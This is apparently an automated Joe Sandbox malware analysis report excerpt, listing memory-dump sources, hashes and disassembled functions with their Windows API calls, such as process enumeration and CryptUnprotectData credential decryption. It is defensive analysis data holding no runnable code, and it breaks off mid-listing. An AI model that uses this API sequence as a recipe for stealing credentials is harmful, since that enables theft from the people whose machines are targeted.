                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 52a8c0d6dba93816a99f42a2a24f588c0201451f93bb37f7d13d6ff0fb4409a4
                          • Instruction ID: 922fda3bf3f069c4099ad58701a34be53594fcc213284005cfbff367ee785725
                          • Opcode Fuzzy Hash: 52a8c0d6dba93816a99f42a2a24f588c0201451f93bb37f7d13d6ff0fb4409a4
                          • Instruction Fuzzy Hash: 81011275A84208BBEB10DFD4CD49F9E77B8FB44704F208555FB05AB2C0D7B4AA008B69
                          Function 00559600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0055961E
                          • Process32First.KERNEL32(00560ACA,00000128), ref: 00559632
                          • Process32Next.KERNEL32(00560ACA,00000128), ref: 00559647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0055965C
                          • CloseHandle.KERNEL32(00560ACA), ref: 0055967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: 5542765b83d447fe76b6c1ac9a591a3884f50f913d55e1684c9121ea195d30da
                          • Instruction ID: 30f10f6d7647c54cd76cc577cf2f5a09c0627176ebb3f7460e8ff16ccef10938
                          • Opcode Fuzzy Hash: 5542765b83d447fe76b6c1ac9a591a3884f50f913d55e1684c9121ea195d30da
                          • Instruction Fuzzy Hash: 56011E75A40208FBDB15DFA5DD58BEDBBF8FB48301F10819AA90697240D738AB48DF51
                          Function 00916A85 Relevance: 6.4, Strings: 4, Instructions: 1353COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (q/$+#I$>^g$C3w%
                          • API String ID: 0-1949164112
                          • Opcode ID: 86c0875435074c6301b788131a363f9c4f84e3e0e12936b013c1ddb60c920320
                          • Instruction ID: baf8b2b0ce68773f7008828a9fde67dc21f0bcf40f38d0634343c9970d712789
                          • Opcode Fuzzy Hash: 86c0875435074c6301b788131a363f9c4f84e3e0e12936b013c1ddb60c920320
                          • Instruction Fuzzy Hash: E692F7F3A0C2149FE3046E2DEC8567ABBE9EF94720F1A493DEAC4D3744E53598058693
                          Function 00905CF0 Relevance: 6.3, Strings: 4, Instructions: 1273COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0-|{$H`S$K4<o$S^F}
                          • API String ID: 0-2203729788
                          • Opcode ID: d63b588829bbc921650dadf6bd7d07aed88c0d6e77f78903c6ae6c17403e7b21
                          • Instruction ID: c88b54c6f6d99c85bb29274da4a7ca680f45b5ddeaaacd278d8ead7d82a66581
                          • Opcode Fuzzy Hash: d63b588829bbc921650dadf6bd7d07aed88c0d6e77f78903c6ae6c17403e7b21
                          • Instruction Fuzzy Hash: 02822AF3A0C604AFE3046E2DEC8567AFBE9EF94760F1A453DEAC5C3340E63558158692
                          Function 00558EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00545184,40000001,00000000,00000000,?,00545184), ref: 00558EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: d75f15da5fdf7a5c3e094528c9e45fef5f6188f8f2bc24e90b69ae6d59ec6a21
                          • Instruction ID: bd0c89bd58a0195c6973b113b63cb12f4f4e7e22e05ee27225a3465efb46f777
                          • Opcode Fuzzy Hash: d75f15da5fdf7a5c3e094528c9e45fef5f6188f8f2bc24e90b69ae6d59ec6a21
                          • Instruction Fuzzy Hash: 4B110670200209BFDB00CFA4DC99FBA3BA9BF89315F109849FD1A9B250DB35E845DB64
                          Function 00557A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0123F128,00000000,?,00560E10,00000000,?,00000000,00000000), ref: 00557A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00557A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0123F128,00000000,?,00560E10,00000000,?,00000000,00000000,?), ref: 00557A7D
                          • wsprintfA.USER32 ref: 00557AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: 2d3e5e8b4172441975bad85ba95de534a54b2a4c7a569446806640a355a4b17d
                          • Instruction ID: 745be23eac5a31053389751bde1a19abe734283e5445a4c9f54f1fc9edd83371
                          • Opcode Fuzzy Hash: 2d3e5e8b4172441975bad85ba95de534a54b2a4c7a569446806640a355a4b17d
                          • Instruction Fuzzy Hash: 4B11A1B1A45218EBEB20CF54DC59FAABB78FB04721F10479AEA0A932C0D7781E44CF51
                          Function 0090ECD6 Relevance: 5.8, Strings: 4, Instructions: 786COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: :uG~$P?<$S6n?$u'>
                          • API String ID: 0-599339616
                          • Opcode ID: c23466018452e05a65db23ee96b5766aecd6baa940b6c038ebeb5d7efae0cfce
                          • Instruction ID: d6f1cfc2cff25757ba8f2543dd484997bdc2fa5df22bdad6272a217dd8e666d5
                          • Opcode Fuzzy Hash: c23466018452e05a65db23ee96b5766aecd6baa940b6c038ebeb5d7efae0cfce
                          • Instruction Fuzzy Hash: 7B3207B3A082009FE308AE2DDC8567ABBE9EF94320F16453DEAC5C7744EA7558058797
                          Function 009073B4 Relevance: 5.3, Strings: 3, Instructions: 1599COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: URm\$V0H$R/
                          • API String ID: 0-1331272546
                          • Opcode ID: 2cf263e983437ff9a86b2f3c6f6409b80751e7d20e40225d75ac74165fec0fa1
                          • Instruction ID: 9181df0f042b22658fe3fc2ec86c7621a7ec8edd5cf524b329cc5a97fa6ac851
                          • Opcode Fuzzy Hash: 2cf263e983437ff9a86b2f3c6f6409b80751e7d20e40225d75ac74165fec0fa1
                          • Instruction Fuzzy Hash: E0B217F360C204AFE304AE2DEC8567ABBE9EFD4720F1A453DE6C5C3744EA3558058696
                          Function 00914CFF Relevance: 5.3, Strings: 3, Instructions: 1549COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: G#"$'uH$D:{
                          • API String ID: 0-482785387
                          • Opcode ID: 3c00b0b9aac7083935ca0e9a597e014d58f9e1cfdc63aaadaabcd3ddd8515991
                          • Instruction ID: 20577e37f0cc7ed643de670609eab1282fdcc129ee6a2fcdecd2018f51dd975e
                          • Opcode Fuzzy Hash: 3c00b0b9aac7083935ca0e9a597e014d58f9e1cfdc63aaadaabcd3ddd8515991
                          • Instruction Fuzzy Hash: F1A2C3F360C200AFE304AE29EC8577ABBE9EF94720F16493DEAC4C7744E63558458697
                          Function 00553720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(0055E118,00000000,00000001,0055E108,00000000), ref: 00553758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005537B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: c172164eba52fd8577a878478c2fac5f1fd85d1f5705e82d7960921649e514f2
                          • Instruction ID: 78c3c429b52c3e1de23784cb66563492de7df45cf524d97a9f0a2aacc1bd8696
                          • Opcode Fuzzy Hash: c172164eba52fd8577a878478c2fac5f1fd85d1f5705e82d7960921649e514f2
                          • Instruction Fuzzy Hash: EC410A71A40A18AFDB24DB58CC95B9BB7B4BB48702F4081D9E608E72D0E7716E85CF50
                          Function 00549B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00549B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00549BA3
                          • LocalFree.KERNEL32(?), ref: 00549BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 6c6f12953a0d7258563196cabb9a41c060cecc86cbf58d7c8f9a34c3893f011c
                          • Instruction ID: 5f26bb7db2c95d5a81a143916bc89891b0d3d7da05e544f4400c5a5e29833ed5
                          • Opcode Fuzzy Hash: 6c6f12953a0d7258563196cabb9a41c060cecc86cbf58d7c8f9a34c3893f011c
                          • Instruction Fuzzy Hash: FC11CCB4A40209EFDB04DFA4D985EAE77B5FF88300F108599E91597350D774AE10CFA1
                          Function 0081A01F Relevance: 2.7, Strings: 2, Instructions: 195COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
